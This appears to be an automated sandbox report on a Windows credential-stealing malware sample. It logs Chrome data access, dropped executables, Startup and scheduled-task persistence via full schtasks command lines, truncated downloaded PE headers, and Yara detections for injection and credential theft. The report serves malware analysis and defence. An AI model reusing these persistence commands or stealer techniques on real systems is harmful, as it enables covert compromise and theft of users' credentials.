file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Sync Extension Settings\flpiciilemghbmfalicajoolhkkenfel\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.ldb
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Sync Extension Settings\fhilaheimglignddkjgofkcbgekhenbh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gojhcdgcpbpfigcaejpfhfegekdgiblk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Sync Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Sync Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Sync Extension Settings\kkpllkodjeloidieedojogacfhpaihoh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka\CURRENT

Looks up the external IP address (1 event)

domain

ipinfo.io

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gn2NF5bKoBfySMlY_Quu.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\reZ6hWk3uTMCU8DEiLuN.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\mfiHK3tvHMJf4FRrzQj9.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\GCJM2BjvEnYGmelfoaDl.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gGsdfWLuIIWuTEAQRw0I.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk

Creates a suspicious process (2 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (4 events)

file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\GCJM2BjvEnYGmelfoaDl.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gGsdfWLuIIWuTEAQRw0I.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\mfiHK3tvHMJf4FRrzQj9.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gn2NF5bKoBfySMlY_Quu.exe

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\mfiHK3tvHMJf4FRrzQj9.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\GCJM2BjvEnYGmelfoaDl.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gn2NF5bKoBfySMlY_Quu.exe
file	C:\Users\test22\AppData\Local\Temp\heidiawcqm451S0Vs\gGsdfWLuIIWuTEAQRw0I.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2760 thread_handle: 0x0000019c process_identifier: 2756 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a0	1	1	0
CreateProcessInternalW Feb. 10, 2024, 2:38 p.m.	thread_identifier: 2844 thread_handle: 0x000001a8 process_identifier: 2840 current_directory: filepath: track: 1 command_line: schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001a4	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Feb. 10, 2024, 2:38 p.m.	process_identifier: 192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x04e90000 process_handle: 0xffffffff	1	0	0

An executable file was downloaded by the process hunta.exe (5 events)

Time & API	Arguments	Status	Return
InternetReadFile Feb. 10, 2024, 2:38 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ç®Þ¦íýÞ¦íýÞ¦íýj:ýý¦íýj:ýC¦íýj:ýý¦íý@*ýß¦íýÎèüó¦íýÎéüÌ¦íýÎîüË¦íý×Þný×¦íý×Þ~ýû¦íýÞ¦ìý÷¤íý{Ïãü¦íý{Ïîüß¦íý{Ïýß¦íýÞ¦zýß¦íý{Ïïüß¦íýRichÞ¦íýPEL¹wÇeà"¬ RwÀ @`á@@@d\|@ Dà uð4@À .text« ¬ `.rdataûÀ ü° @@.datalpÀH¬@À.rsrcD@ ô@@.relocuà v @B¹t Mè8ýhé#DèðYÃhó#DèðYÃèæÞhø#DèrðYÃèY<hý#DèaðYÃQè©h$DèOðYÃ¡0MQ@0MPèã#h$Dè/ðYÃèÞ%h$DèðYÃè®çh!$Dè ðYÃèA2h&$DèüïYÃèPÁh0$DèëïYÃ¹%Mèh?$DèÕïYÃVñNè´Nè¬j(VèâìYYÆ^ÂUìì8Ç0MtÉI3ÒÇM0ÉI M¤MVQf¨Mèo¡0M@Ç0M\ÉI¡0MHûÿÿ,M3À¹¸M£ÌM£ÐM£ÔMèY ¹èMèí¹øMèã¹MèÙ3À¹M£TM£XM£\M£`M£dM£hM£lM£pM£tM£xMè3ÀÇ¬M<ÉI¹M£M£Mf£M£ M£¤Mf£¨M£°M£´M£¸M£¼M£ÀM£ÄMÇÈM@ÉI£ÌM£ÐM£ÔMÇØM@ÉI£ÜM£àM£äMÇèM@ÉI£ìM£ðM£ôMÇøMDÉI£üM£M£M£M£MÇMèÏ¹(MèÇM<ÉI3Ò¹MMMMè¹@Mè3À¹MP£`M£dM£hM£pM£tM£xMèGMÈè$P¡0MHÁ4MèMèè¼MÈè{¼3ÀfÇ0Mjö£,M£ M£$M£M£M£(M£Mf£lM¢M¢}M£\MÿhÂIðö3Ò\|MèÂRÿhÈI¸0M^ÉÂ¡0M¹@MV@Ç0MhÉI3À£4M£8M£<Mè+¹tMè!¾¨MÎèh ÉIÎèoW¸0M^ÂVñNèeNè request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 10, 2024, 2:38 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL»eà"VðX°@ Y¯ú#@W°k`°Cø± Pè@à.rsrc°C`ø@À.idata ° @À +À @àoodobeskÐ> @àoxphtadcàX#@à.taggant0ðX"#@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 10, 2024, 2:38 p.m.	buffer: MZÿÿ¸@zº´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$ ÀF `@ G `Ui`ø @ @à.rsrc`2@À.idata 6@À + 8@àokuzajnuàÀ+à:@àibrumeyx F@à.taggant@ÀF"@à request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 10, 2024, 2:38 p.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëîº¸îº¸îº¸L¹¹ îº¸L¿¹Æîº¸L½¹îº¸HG¸îº¸H¾¹îº¸H¹¹îº¸H¿¹Rîº¸L¾¹îº¸L¼¹îº¸L»¹îº¸î»¸ïº¸Ì³¹îº¸ÌE¸îº¸î-¸îº¸Ì¸¹îº¸Richîº¸PELÙÅeà"¨>E±À@`±@ Ð8Þx Ð°8@àpÀ"<@à@0^@àpf@àdf@à.rsrcÊ@@x (Ø @à.dataÀ" º" @à¯?eH¡+/>øêùì;}Ãyæ Qßw²ûUfê<?V= Ê±ëAGdèÐìß}Àø¿~Pc9FL¼VjÎÓf£mácÆÆÆòç2×ÒÁ§1®³ºÑUå2dnÄ»ÖK%üÎïD£.'½ÞÕ35òLÂTNûPó¼T¼¡göºªódn¬Vs,¶\iæ ¶;Ú$¿îð~Âq:üÃÑ[âL¡7>ªòQm3§v åõ\|ËúòA>úÉq,Ñ²oÌ&¨=lxL÷ÎÙ+M¾WÖEiÇ©·MòIÙÔÅg{Äe,ÇîÊïÁªv[¤fÖ£lF2VXÂa¦Ì¦/tRa`uÀ!ïmn^¥Ý¿NÈ»±pÒ»TÈ Zþêj(UW¢Oêá¾ÙØ6XÖÝÌB)¯2.¬Ct½£I3²ÃDÌKSÝéVãoÔ+UÍTxSçÛnø£öWH}Jò:»7CàâG¬}¯Ú·¾¿<T:Ë¯Þnvõßß¸&Ö7-$ C4æAÖÎøoÁ"©ÚîÛ' ¨ÊÉ/yÓ»wpZXÇ_"üøpàÌ¾ú»¼S÷ÛÑlYZ%Ø^¼úEë©6èÄÿ)"£ÿpï¢ROs åË?ð.÷ì'ðcyZê«#`¾P{}à Å;BAØÞ?`sGä×ãpùÐqûl>6ålÂ+!«hÔ¥®)~"¨ÏAE#30t´ Eæ[©¬)¸mÄø°i.GgÔ«G¾üü$0$Ð%n=kÓëEÀ2vYÏtwªÏ5¡»æe½³×¤> Î¦®ÕùCÞÍÃíÔ¯<ùR2à\|v/ÊrIn«nêjq¿~o¨¨se÷)AL){´ßÐjWVWë&TèºÛOôZi×¯©SG<, \|T:@Ñ¯>9o@¦Ñ\JÕoªy]hqÓjÃØÀ¹ëm/:Ï¿p³²q{sI½¬Y¦sªÇ4'Ä[¨ý,}°tÜõQû¦µD~Êó¿BDJGxÏ5¦µ¬ü´'ÉGIu]H3¯QÄw®3¢ÈX«Ï¿«Zb,ú%g¼»Fr»C¦K%XW»×à¦£Zìj_¸%üKAIòZ ZõuóÏk½.ØD9¡#¢"¤ x bÄbd ~%·r÷ïvÚü. request_handle: 0x00cc000c	1	1
InternetReadFile Feb. 10, 2024, 2:38 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $CÔëìº¸ìº¸ìº¸L¹¹ ìº¸L¿¹Æìº¸L½¹ìº¸HG¸ìº¸H¾¹ìº¸H¹¹ìº¸H¿¹Rìº¸L¾¹ìº¸L¼¹ìº¸L»¹ìº¸ì»¸íº¸Ì³¹ìº¸ÌE¸ìº¸ì-¸ìº¸Ì¸¹ìº¸Richìº¸PEL»eà"VðX°@ Y¯ú#@W°k`°Cø± Pè@à.rsrc°C`ø@À.idata ° @À +À @àoodobeskÐ> @àoxphtadcàX#@à.taggant0ðX"#@à request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (4 events)

section

{u'size_of_data': u'0x0008ee00', u'virtual_address': u'0x00001000', u'entropy': 7.983336666017033, u'name': u' \\x00 ', u'virtual_size': u'0x00136000'}

entropy

7.98333666602

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00002000', u'virtual_address': u'0x00137000', u'entropy': 7.905035528834985, u'name': u'.rsrc', u'virtual_size': u'0x000110a0'}

entropy

7.90503552883

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x001c1200', u'virtual_address': u'0x0041e000', u'entropy': 7.916928655853202, u'name': u'bbptunxo', u'virtual_size': u'0x001c2000'}

entropy

7.91692865585

description

A section with a high entropy has been found

entropy

0.995600251414

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Feb. 10, 2024, 2:38 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

system

Potentially malicious URLs were found in the process memory dump (50 out of 1137 events)

url	https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml
url	https://crash-reports.mozilla.com/submit?id=
url	https://hg.mozilla.org/releases/mozilla-release/rev/92187d03adde4b31daef292087a266f10121379c
url	https://crashpad.chromium.org/bug/new
url	https://crashpad.chromium.org/
url	https://clients4.google.com/invalidation/android/request/
url	http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
url	http://services.ukrposhta.com/postindex_new/
url	http://dts.search-results.com/sr?lng=
url	http://inposdom.gob.do/codigo-postal/
url	http://creativecommons.org/ns
url	http://www.postur.fo/
url	https://qc.search.yahoo.com/search?ei=
url	https://cacert.omniroot.com/baltimoreroot.crt09
url	https://codereview.chromium.org/25305002).
url	https://search.yahoo.com/search?ei=
url	http://t1.symcb.com/ThawtePCA.crl0/
url	http://crbug.com/31395.
url	https://support.google.com/chrome/answer/165139
url	https://ct.googleapis.com/aviator/
url	https://datasaver.googleapis.com/v1/clientConfigs
url	http://crl.starfieldtech.com/sfroot-g2.crl0L
url	https://ct.startssl.com/
url	https://suggest.yandex.com.tr/suggest-ff.cgi?part=
url	https://de.search.yahoo.com/favicon.ico
url	https://github.com/GoogleChrome/Lighthouse/issues
url	http://www.searchnu.com/favicon.ico
url	https://support.google.com/installer/?product=
url	http://msdn.microsoft.com/en-us/library/ms792901.aspx
url	https://www.najdi.si/search.jsp?q=
url	http://x.ss2.us/x.cer0
url	http://crl.geotrust.com/crls/gtglobal.crl04
url	https://accounts.google.com/ServiceLogin
url	https://accounts.google.com/OAuthLogin
url	https://c.android.clients.google.com/
url	https://www.google.com/tools/feedback/chrome/__submit
url	https://chrome.google.com/webstore/category/collection/dark_themes
url	http://check.googlezip.net/generate_204
url	http://ocsp.starfieldtech.com/08
url	http://www.guernseypost.com/postcode_finder/
url	http://crl.certum.pl/ca.crl0h
url	http://ator
url	https://suggest.yandex.by/suggest-ff.cgi?part=
url	http://feed.snap.do/?q=
url	https://sp.uk.ask.com/sh/i/a16/favicon/favicon.ico
url	http://www.language
url	https://support.google.com/chrome/
url	http://developer.chrome.com/apps/declare_permissions.html
url	http://www.google.com/chrome/intl/ko/eula_text.html
url	https://www.globalsign.com/repository/03

Yara rule detected in process memory (50 out of 1775 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Client_SW_User_Data_Stealer	rule	Client_SW_User_Data_Stealer
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	browser info stealer	rule	infoStealer_browser_Zero
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Google Chrome User Data Check	rule	Chrome_User_Data_Check_Zero
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero

Queries for potentially installed applications (39 events)

Time & API	Arguments	Status
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000004ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x000004c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 10, 2024, 2:38 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
